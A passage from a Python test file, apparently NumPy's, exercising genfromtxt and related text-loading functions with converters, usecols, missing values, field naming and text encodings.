warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test, ctrl)
def test_names_and_comments_none(self):
# Tests case when names is true but comments is None (gh-10780)
data = TextIO('col1 col2\n 1 2\n 3 4')
test = np.genfromtxt(data, dtype=(int, int), comments=None, names=True)
control = np.array([(1, 2), (3, 4)], dtype=[('col1', int), ('col2', int)])
assert_equal(test, control)
def test_autonames_and_usecols(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
# Test the combination user-defined converters and usecol
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None,
converters={'C': lambda s: 2 * int(s)})
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
# Test the conversion to datetime.
converter = {
'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
# Test the conversion to datetime64.
converter = {
'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
# Test whether unused converters are forgotten
data = TextIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(
converters={2: strip_per, 3: strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
# Test some corner cases
s = TextIO('q1,2\nq3,4')
cnv = lambda s: float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0: cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_converters_and_usecols(self):
dstr = "1,5,-1,1:1\n2,8,-1,1:n\n3,3,-2,m:n\n"
dmap = {'1:1':0, '1:n':1, 'm:1':2, 'm:n':3}
dtyp = [('e1','i4'),('e2','i4'),('e3','i2'),('n', 'i1')]
conv = {0: int, 1: int, 2: int, 3: lambda r: dmap[r.decode()]}
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
names=None, converters=conv)
control = np.rec.array([(1,5,-1,0), (2,8,-1,1), (3,3,-2,3)], dtype=dtyp)
assert_equal(test, control)
dtyp = [('e1','i4'),('e2','i4'),('n', 'i1')]
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
usecols=(0,1,3), names=None, converters=conv)
control = np.rec.array([(1,5,0), (2,8,1), (3,3,3)], dtype=dtyp)
assert_equal(test, control)
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
ndtype = [('nest', [('idx', int), ('code', object)])]
with assert_raises_regex(NotImplementedError,
'Nested fields.* not supported.*'):
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
def test_userconverters_with_explicit_dtype(self):
# Test user_converters w/ explicit (standard) dtype
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_utf8_userconverters_with_explicit_dtype(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'skip,skip,2001-01-01' + utf8 + b',1.0,skip')
test = np.genfromtxt(path, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: np.unicode},
encoding='UTF-8')
control = np.array([('2001-01-01' + utf8.decode('UTF-8'), 1.)],
dtype=[('', '|U11'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
# Test space delimiter
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[1., 2., 3., 4., 5.],
[6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
# Test using an integer for delimiter
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
# Test w/ a delimiter tab
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
# Test the selection of columns
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
# Test giving usecols with a comma-separated string
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
# Test usecols with an explicit structured dtype
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(
data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
# Test usecols with an integer
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
# Test usecols with named columns
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
# Test that an empty file raises the proper warning.
with suppress_warnings() as sup:
sup.filter(message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', float), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 1: -99, 2: -999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 'B': -99, 'C': -999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
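    # Note: missing_values and filling_values may be a single value applied
    # to every column, or a dict keyed per column by index or by field
    # name, mixed freely, as in {0: -9, 'B': -99, 'C': -999j} above.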
def test_user_filling_values(self):
# Test with missing and filling values
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0: "N/A", 'b': " ", 2: "???"},
filling_values={0: 0, 'b': 0, 2: -999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
data2 = "1,2,*,4\n5,*,7,8\n"
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=0)
ctrl = np.array([[1, 2, 0, 4], [5, 0, 7, 8]])
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=-1)
ctrl = np.array([[1, 2, -1, 4], [5, -1, 7, 8]])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
# Test masked column
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
# Test masked column
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
# Test invalid raise
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the
# callable in assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
# Test invalid_raise with usecols
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the
# callable in assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
# Test inconsistent dtype
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x: "(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
# Test default format
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
# Test single dtype w/o names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
# Test single dtype w explicit names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
# Test single dtype w implicit names
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
# Test easy structured dtype
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
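    # Note: defaultfmt only names fields that were not named explicitly;
    # a bare tuple dtype leaves every field unnamed, hence ("f_00", "f_01",
    # "f_02") here, while names="a" with a three-field dtype yields
    # ("a", "f0", "f1") (see test_names_auto_completion below).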
def test_autostrip(self):
# Test autostrip
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.ndfromtxt(TextIO(data), **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.ndfromtxt(TextIO(data), autostrip=True, **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
# Test the 'replace_space' option
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_replace_space_known_dtype(self):
# Test the 'replace_space' (and related) options when dtype != None
txt = "A.A, B (B), C:C\n1, 2, 3"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
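    # Note: header sanitizing is controlled by two knobs: spaces become
    # replace_space ('_' by default) and characters in deletechars are
    # dropped; replace_space='' together with deletechars='' disables both,
    # for inferred (dtype=None) and explicit dtypes alike.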
def test_incomplete_names(self):
# Test w/ incomplete names
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
        test = np.ndfromtxt(TextIO(data), **kwargs)
        assert_equal(test, ctrl)
def test_names_auto_completion(self):
# Make sure that names are properly completed
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
# Make sure we pick up the right names w/ usecols
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
# Test fix-width w/ names
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
# Test missing values
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values=-999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b'testNonetherestofthedata')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b' testNonetherestofthedata')
def test_latin1(self):
latin1 = b'\xf6\xfc\xf6'
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + latin1 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1, 0], b"test1")
assert_equal(test[1, 1], b"testNonethe" + latin1)
assert_equal(test[1, 2], b"test3")
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',',
encoding='latin1')
assert_equal(test[1, 0], u"test1")
assert_equal(test[1, 1], u"testNonethe" + latin1.decode('latin1'))
assert_equal(test[1, 2], u"test3")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(b"0,testNonethe" + latin1),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test['f0'], 0)
assert_equal(test['f1'], b"testNonethe" + latin1)
def test_binary_decode_autodtype(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=None, encoding='UTF-16')
assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_utf8_byte_encoding(self):
utf8 = b"\xcf\x96"
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + utf8 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
[b'norm1', b'norm2', b'norm3'],
[b'test1', b'testNonethe' + utf8, b'test3'],
[b'norm1', b'norm2', b'norm3']])
assert_array_equal(test, ctl)
def test_utf8_file(self):
utf8 = b"\xcf\x96"
with temppath() as path:
with open(path, "wb") as f:
f.write((b"test1,testNonethe" + utf8 + b",test3\n") * 2)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
ctl = np.array([
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"],
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"]],
dtype=np.unicode)
assert_array_equal(test, ctl)
# test a mixed dtype
with open(path, "wb") as f:
f.write(b"0,testNonethe" + utf8)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
assert_equal(test['f0'], 0)
assert_equal(test['f1'], "testNonethe" + utf8.decode("UTF-8"))
def test_utf8_file_nodtype_unicode(self):
# bytes encoding with non-latin1 -> unicode upcast
utf8 = u'\u03d6'
latin1 = u'\xf6\xfc\xf6'
# skip test if cannot encode utf8 test string with preferred
# encoding. The preferred encoding is assumed to be the default
# encoding of io.open. Will need to change this for PyTest, maybe
# using pytest.mark.xfail(raises=***).
try:
encoding = locale.getpreferredencoding()
utf8.encode(encoding)
except (UnicodeError, ImportError):
pytest.skip('Skipping test_utf8_file_nodtype_unicode, '
'unable to encode utf8 in preferred encoding')
with temppath() as path:
with io.open(path, "wt") as f:
f.write(u"norm1,norm2,norm3\n")
f.write(u"norm1," + latin1 + u",norm3\n")
f.write(u"test1,testNonethe" + utf8 + u",test3\n")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '',
np.VisibleDeprecationWarning)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',')
# Check for warning when encoding not specified.
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
["norm1", "norm2", "norm3"],
["norm1", latin1, "norm3"],
["test1", "testNonethe" + utf8, "test3"]],
dtype=np.unicode)
assert_array_equal(test, ctl)
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
